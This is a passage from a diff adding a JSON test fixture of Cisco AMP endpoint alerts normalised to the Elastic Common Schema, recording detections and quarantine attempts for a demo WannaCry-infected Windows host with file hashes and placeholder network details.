+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419275394960064602",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:39:51.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843728796Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419275399255032000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419275394960064601",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:39:51.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843730684Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419275399255032000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419275394960064598",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:39:51.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843732572Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064600\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419275399255032000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419275394960064600",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "cmd.exe",
+                "pid": 3200,
+                "hash": {
+                    "sha1": "ee8cbf12d87c4d388f09b4f69bed2e91682920b5",
+                    "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae",
+                    "md5": "ad7b9c14083b52bc532fba5948342b98"
+                }
+            },
+            "@timestamp": "2021-01-14T17:39:51.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843734515Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":812000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031906\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":3200,\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\",\"sha1\":\"ee8cbf12d87c4d388f09b4f69bed2e91682920b5\",\"md5\":\"ad7b9c14083b52bc532fba5948342b98\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419275399255032000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Variant:Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419275399255031906",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "tasksche.exe",
+                "pid": 2708,
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "@timestamp": "2021-01-14T17:39:51.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "md5": "84c82835a5d21bbcf75a61706d8ab549"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "84c82835a5d21bbcf75a61706d8ab549",
+                    "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843736405Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":235000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":2708,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419275399255032000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Variant:Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Malicious",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419275399255031905",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:39:51.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\Windows\\tasksche.exe",
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843738275Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":172000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031904\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419275399255032000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Variant:Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419275399255031904",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:39:51.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843740157Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419275394960064599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Threat Quarantined",
+                "id": "6419275399255032000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "detection_id": "6419275394960064599",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648143
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:39:50.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843765247Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":423000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419275394960065000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419275394960064597",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:39:50.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843776640Z",
